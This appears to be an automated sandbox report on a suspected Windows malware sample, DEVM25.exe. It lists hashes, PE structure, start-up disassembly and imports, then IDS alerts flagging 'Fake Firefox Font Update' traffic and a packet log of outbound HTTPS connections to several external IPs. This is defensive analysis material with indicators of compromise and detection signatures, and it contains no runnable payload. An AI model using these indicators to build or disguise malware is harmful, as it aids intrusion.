SHA1:	405CEB337ED3BC7031304346F9ADB6E6AB54248D
SHA-256:	442A657DF72B1BA15F6A5345C579237876C684D79E02683D0738BB4ADE62C97D
SHA-512:	C5C6767DA91D6F1294A6C6A03F15FFE83BF8F654027F89E0224B3948AAB415275159C89EE24DBCC883808929400F63C5C6F40236A6F02A650A6054807F17C01B
Malicious:	false
Reputation:	low
Preview:	regfI...I....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm....f...............................................................................................................................................................................................................................................................................................................................................0..9HvLE.n......I....`.......}%........B9...........`............... .......@... ..hbin.................\.Z............nk,..\.Z....................h...................................<.......&...{11517B7C-E79D-4e20-961B-75A811715ADD}..`...sk..........G...........\...l.............H.........?...................?...................?........... ... ........... ... ...................$.N..........vk..4...`...........CreatingCommand.....O.n.e.D.r.i.v.e.S.e.t.u.p...e.x.e. ./.s.i.l.e.n.t...

Static File Info

General

File type:	PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit):	7.690480563317747
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	DEVM25.exe
File size:	1'369'600 bytes
MD5:	9fe5481f315ba58f770036d3fd7e4df6
SHA1:	d1e2ef9941cd64464f072c6b8057dd2412b8dd6c
SHA256:	0c02329918aab4ea3d1cba93f48aa04ac154ce281562893ebd083806a01bc4e3
SHA512:	f2b04112a6a5ce4934ad49e65a997530ac8d20c90ffbe2181ed6df5864d81e1daa8ad8cb9c3d87282860818387b49fc0512132e05d77b3ccb8699bd6b4509f0f
SSDEEP:	24576:4Ai/c6dNtEWZ4B+UsxoxbzmXdyYgUerkn1S2yYgUerkn1S:e0qNtnKB+UsxoxbzYdy3Uer81S2y3UeH
TLSH:	A255E17270C1C073FA5159B23598E3B9146BF572DE2E0FC7A2B4E3349148AD11BAA52F
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......g..........................................@.......................................@.................................06..<..

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x46e682
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x67D09BB6 [Tue Mar 11 20:23:18 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	d462aa757f68629e41b3df6e6d4c6a3c

Authenticode Signature

Signature Valid:
Signature Issuer:
Signature Validation Error:
Error Number:
Not Before, Not After
Subject Chain
Version:
Thumbprint MD5:
Thumbprint SHA-1:
Thumbprint SHA-256:
Serial:

Entrypoint Preview

Instruction
call 00007FCED8BC25DAh
jmp 00007FCED8BC2449h
mov ecx, dword ptr [00496840h]
push esi
push edi
mov edi, BB40E64Eh
mov esi, FFFF0000h
cmp ecx, edi
je 00007FCED8BC25D6h
test esi, ecx
jne 00007FCED8BC25F8h
call 00007FCED8BC2601h
mov ecx, eax
cmp ecx, edi
jne 00007FCED8BC25D9h
mov ecx, BB40E64Fh
jmp 00007FCED8BC25E0h
test esi, ecx
jne 00007FCED8BC25DCh
or eax, 00004711h
shl eax, 10h
or ecx, eax
mov dword ptr [00496840h], ecx
not ecx
pop edi
mov dword ptr [00496880h], ecx
pop esi
ret
push ebp
mov ebp, esp
sub esp, 14h
lea eax, dword ptr [ebp-0Ch]
xorps xmm0, xmm0
push eax
movlpd qword ptr [ebp-0Ch], xmm0
call dword ptr [00493864h]
mov eax, dword ptr [ebp-08h]
xor eax, dword ptr [ebp-0Ch]
mov dword ptr [ebp-04h], eax
call dword ptr [00493824h]
xor dword ptr [ebp-04h], eax
call dword ptr [00493820h]
xor dword ptr [ebp-04h], eax
lea eax, dword ptr [ebp-14h]
push eax
call dword ptr [004938ACh]
mov eax, dword ptr [ebp-10h]
lea ecx, dword ptr [ebp-04h]
xor eax, dword ptr [ebp-14h]
xor eax, dword ptr [ebp-04h]
xor eax, ecx
leave
ret
mov eax, 00004000h
ret
push 00498490h
call dword ptr [00493884h]
ret
push 00030000h
push 00010000h
push 00000000h
call 00007FCED8BC9125h
add esp, 0Ch

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x93630	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x99e00	0x4540
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x9a000	0x435c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x8fb28	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x8bf98	0xc0	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x937c0	0x154	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x89ad0	0x89c00	0bd698a1f44cc91b018d0fe5240109ab	False	0.5286942774500908	data	7.09207256696417	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8b000	0xa034	0xa200	383899a836f6650ba73e1556e24d0e62	False	0.4230806327160494	data	4.888147649186249	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x96000	0x2c5c	0x1600	233e04c81724f6e0f553a5dbb15f0a09	False	0.4073153409090909	data	4.744840434225013	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x99000	0x9	0x200	1f354d76203061bfdd5a53dae48d5435	False	0.033203125	data	0.020393135236084953	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x9a000	0x435c	0x4400	b181df1a2af7bbd01ea74e454a21e7ba	False	0.7916475183823529	data	6.714823432652306	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.bss	0x9f000	0x58000	0x58000	9aed4a7f32239144b6065c58a4e40627	False	1.0003218217329546	OpenPGP Public Key	7.999487849375016	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss	0xf7000	0x58000	0x58000	9aed4a7f32239144b6065c58a4e40627	False	1.0003218217329546	OpenPGP Public Key	7.999487849375016	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL

Import

KERNEL32.dll

AcquireSRWLockExclusive, CloseHandle, CompareStringW, CreateFileW, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeConsole, FreeEnvironmentStringsW, FreeLibrary, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEndOfFile, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile

ole32.dll

OleDraw

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-03-14T11:47:11.473766+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.9	49683	149.154.167.99	443	TCP
2025-03-14T11:47:12.499413+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.9	49684	104.21.80.1	443	TCP
2025-03-14T11:47:14.559453+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.9	49685	104.21.80.1	443	TCP
2025-03-14T11:47:15.954312+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.9	49687	104.21.80.1	443	TCP
2025-03-14T11:47:17.192519+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.9	49689	104.21.80.1	443	TCP
2025-03-14T11:47:19.444801+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.9	49691	104.21.80.1	443	TCP
2025-03-14T11:47:21.041675+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.9	49694	104.21.80.1	443	TCP
2025-03-14T11:47:22.745122+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.9	49695	104.21.80.1	443	TCP
2025-03-14T11:47:23.235684+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.9	49696	188.114.97.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 14, 2025 11:47:10.826312065 CET	49683	443	192.168.2.9	149.154.167.99
Mar 14, 2025 11:47:10.826360941 CET	443	49683	149.154.167.99	192.168.2.9
Mar 14, 2025 11:47:10.826462030 CET	49683	443	192.168.2.9	149.154.167.99
Mar 14, 2025 11:47:10.862423897 CET	49683	443	192.168.2.9	149.154.167.99
Mar 14, 2025 11:47:10.862462044 CET	443	49683	149.154.167.99	192.168.2.9
Mar 14, 2025 11:47:11.473671913 CET	443	49683	149.154.167.99	192.168.2.9
Mar 14, 2025 11:47:11.473766088 CET	49683	443	192.168.2.9	149.154.167.99
Mar 14, 2025 11:47:11.531882048 CET	49683	443	192.168.2.9	149.154.167.99
Mar 14, 2025 11:47:11.531917095 CET	443	49683	149.154.167.99	192.168.2.9
Mar 14, 2025 11:47:11.532284021 CET	443	49683	149.154.167.99	192.168.2.9
Mar 14, 2025 11:47:11.572936058 CET	49683	443	192.168.2.9	149.154.167.99
Mar 14, 2025 11:47:11.733787060 CET	49683	443	192.168.2.9	149.154.167.99
Mar 14, 2025 11:47:11.776328087 CET	443	49683	149.154.167.99	192.168.2.9
Mar 14, 2025 11:47:11.914208889 CET	443	49683	149.154.167.99	192.168.2.9
Mar 14, 2025 11:47:11.914232016 CET	443	49683	149.154.167.99	192.168.2.9
Mar 14, 2025 11:47:11.914238930 CET	443	49683	149.154.167.99	192.168.2.9
Mar 14, 2025 11:47:11.914320946 CET	49683	443	192.168.2.9	149.154.167.99
Mar 14, 2025 11:47:11.914346933 CET	443	49683	149.154.167.99	192.168.2.9
Mar 14, 2025 11:47:11.914361000 CET	443	49683	149.154.167.99	192.168.2.9
Mar 14, 2025 11:47:11.914427996 CET	49683	443	192.168.2.9	149.154.167.99
Mar 14, 2025 11:47:11.936861992 CET	49683	443	192.168.2.9	149.154.167.99
Mar 14, 2025 11:47:11.936878920 CET	443	49683	149.154.167.99	192.168.2.9
Mar 14, 2025 11:47:11.936897039 CET	49683	443	192.168.2.9	149.154.167.99
Mar 14, 2025 11:47:11.936902046 CET	443	49683	149.154.167.99	192.168.2.9
Mar 14, 2025 11:47:12.034849882 CET	49684	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:12.034899950 CET	443	49684	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:12.034982920 CET	49684	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:12.035332918 CET	49684	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:12.035347939 CET	443	49684	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:12.499252081 CET	443	49684	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:12.499413013 CET	49684	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:12.502104044 CET	49684	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:12.502115011 CET	443	49684	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:12.502471924 CET	443	49684	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:12.504466057 CET	49684	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:12.504501104 CET	49684	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:12.504579067 CET	443	49684	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:12.937678099 CET	443	49684	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:12.937719107 CET	443	49684	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:12.937781096 CET	443	49684	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:12.937783003 CET	49684	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:12.937802076 CET	443	49684	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:12.937830925 CET	49684	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:12.937830925 CET	443	49684	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:12.937845945 CET	443	49684	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:12.938004971 CET	443	49684	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:12.938040972 CET	49684	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:12.938045979 CET	443	49684	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:12.938100100 CET	49684	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:12.938103914 CET	443	49684	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:12.938184023 CET	443	49684	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:12.938206911 CET	443	49684	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:12.938239098 CET	49684	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:12.938242912 CET	443	49684	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:12.938275099 CET	49684	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:13.066926003 CET	443	49684	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:13.067032099 CET	443	49684	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:13.067070007 CET	49684	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:13.067106009 CET	443	49684	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:13.067128897 CET	49684	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:13.067128897 CET	49684	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:13.067137003 CET	443	49684	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:13.067142963 CET	443	49684	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:14.072514057 CET	49685	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:14.072559118 CET	443	49685	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:14.072632074 CET	49685	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:14.073168993 CET	49685	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:14.073180914 CET	443	49685	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:14.559359074 CET	443	49685	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:14.559453011 CET	49685	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:14.929672003 CET	49685	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:14.929714918 CET	443	49685	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:14.930102110 CET	443	49685	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:14.931492090 CET	49685	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:14.931754112 CET	49685	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:14.931788921 CET	443	49685	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:14.931853056 CET	49685	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:14.972342014 CET	443	49685	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:15.372070074 CET	443	49685	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:15.372164011 CET	443	49685	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:15.372253895 CET	49685	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:15.372395039 CET	49685	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:15.372415066 CET	443	49685	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:15.470844984 CET	49687	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:15.470884085 CET	443	49687	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:15.470973969 CET	49687	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:15.471266985 CET	49687	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:15.471275091 CET	443	49687	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:15.954205990 CET	443	49687	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:15.954312086 CET	49687	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:15.955717087 CET	49687	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:15.955729961 CET	443	49687	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:15.955972910 CET	443	49687	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:15.957248926 CET	49687	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:15.957422018 CET	49687	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:15.957473993 CET	443	49687	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:15.957541943 CET	49687	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:15.957554102 CET	443	49687	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:16.461518049 CET	443	49687	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:16.461621046 CET	443	49687	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:16.461692095 CET	49687	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:16.461915970 CET	49687	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:16.461936951 CET	443	49687	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:16.712985039 CET	49689	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:16.713032007 CET	443	49689	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:16.713128090 CET	49689	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:16.713450909 CET	49689	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:16.713469982 CET	443	49689	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:17.192447901 CET	443	49689	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:17.192518950 CET	49689	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:17.193837881 CET	49689	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:17.193850994 CET	443	49689	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:17.194185019 CET	443	49689	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:17.195328951 CET	49689	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:17.195722103 CET	49689	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:17.195971966 CET	443	49689	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:17.196037054 CET	49689	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:17.196044922 CET	443	49689	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:17.748840094 CET	443	49689	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:17.748960972 CET	443	49689	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:17.749082088 CET	49689	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:17.749655008 CET	49689	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:17.749671936 CET	443	49689	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:18.968246937 CET	49691	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:18.968280077 CET	443	49691	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:18.968348026 CET	49691	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:18.968674898 CET	49691	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:18.968683958 CET	443	49691	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:19.444739103 CET	443	49691	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:19.444801092 CET	49691	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:19.446191072 CET	49691	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:19.446196079 CET	443	49691	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:19.446455002 CET	443	49691	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:19.453636885 CET	49691	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:19.453752995 CET	49691	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:19.453774929 CET	443	49691	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:19.875569105 CET	443	49691	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:19.875658989 CET	443	49691	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:19.875937939 CET	49691	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:19.875938892 CET	49691	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:20.182379007 CET	49691	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:20.182403088 CET	443	49691	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:20.562292099 CET	49694	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:20.562330008 CET	443	49694	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:20.562424898 CET	49694	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:20.563081026 CET	49694	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:20.563091040 CET	443	49694	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:21.038503885 CET	443	49694	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:21.041675091 CET	49694	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:21.041675091 CET	49694	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:21.041692972 CET	443	49694	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:21.042013884 CET	443	49694	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:21.053270102 CET	49694	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:21.053270102 CET	49694	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:21.053312063 CET	443	49694	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:21.053488016 CET	49694	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:21.054332018 CET	443	49694	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:21.054474115 CET	49694	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:21.054861069 CET	443	49694	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:21.055058956 CET	49694	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:21.055088997 CET	443	49694	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:21.055222988 CET	49694	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:21.055238962 CET	443	49694	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:21.055346012 CET	49694	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:21.055377007 CET	49694	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:21.055406094 CET	443	49694	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:21.055512905 CET	49694	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:21.055541992 CET	443	49694	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:21.055557013 CET	49694	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:21.055572033 CET	443	49694	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:21.055665016 CET	49694	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:21.055695057 CET	443	49694	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:21.055711985 CET	49694	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:21.055723906 CET	443	49694	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:21.055738926 CET	49694	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:21.055743933 CET	443	49694	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:21.055780888 CET	49694	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:21.055797100 CET	443	49694	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:21.055813074 CET	49694	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:21.055823088 CET	443	49694	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:21.055843115 CET	49694	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:21.055855036 CET	443	49694	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:22.546865940 CET	443	49694	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:22.546964884 CET	443	49694	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:22.547020912 CET	49694	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:22.547091007 CET	49694	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:22.547115088 CET	443	49694	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:22.611051083 CET	49695	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:22.611094952 CET	443	49695	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:22.611174107 CET	49695	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:22.611607075 CET	49695	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:22.611620903 CET	443	49695	104.21.80.1	192.168.2.9
Mar 14, 2025 11:47:22.745121956 CET	49695	443	192.168.2.9	104.21.80.1
Mar 14, 2025 11:47:22.772644997 CET	49696	443	192.168.2.9	188.114.97.3
Mar 14, 2025 11:47:22.772671938 CET	443	49696	188.114.97.3	192.168.2.9
Mar 14, 2025 11:47:22.772773981 CET	49696	443	192.168.2.9	188.114.97.3
Mar 14, 2025 11:47:22.773128033 CET	49696	443	192.168.2.9	188.114.97.3
Mar 14, 2025 11:47:22.773139954 CET	443	49696	188.114.97.3	192.168.2.9
Mar 14, 2025 11:47:23.235486984 CET	443	49696	188.114.97.3	192.168.2.9
Mar 14, 2025 11:47:23.235683918 CET	49696	443	192.168.2.9	188.114.97.3
Mar 14, 2025 11:47:23.238617897 CET	49696	443	192.168.2.9	188.114.97.3
Mar 14, 2025 11:47:23.238629103 CET	443	49696	188.114.97.3	192.168.2.9
Mar 14, 2025 11:47:23.238904953 CET	443	49696	188.114.97.3	192.168.2.9
Mar 14, 2025 11:47:23.240278959 CET	49696	443	192.168.2.9	188.114.97.3
Mar 14, 2025 11:47:23.240293026 CET	49696	443	192.168.2.9	188.114.97.3
Mar 14, 2025 11:47:23.240389109 CET	443	49696	188.114.97.3	192.168.2.9
Mar 14, 2025 11:47:23.668888092 CET	443	49696	188.114.97.3	192.168.2.9
Mar 14, 2025 11:47:23.668939114 CET	443	49696	188.114.97.3	192.168.2.9
Mar 14, 2025 11:47:23.668968916 CET	443	49696	188.114.97.3	192.168.2.9
Mar 14, 2025 11:47:23.668998003 CET	443	49696	188.114.97.3	192.168.2.9
Mar 14, 2025 11:47:23.669015884 CET	49696	443	192.168.2.9	188.114.97.3
Mar 14, 2025 11:47:23.669038057 CET	443	49696	188.114.97.3	192.168.2.9
Mar 14, 2025 11:47:23.669053078 CET	49696	443	192.168.2.9	188.114.97.3
Mar 14, 2025 11:47:23.669078112 CET	443	49696	188.114.97.3	192.168.2.9
Mar 14, 2025 11:47:23.669106960 CET	443	49696	188.114.97.3	192.168.2.9
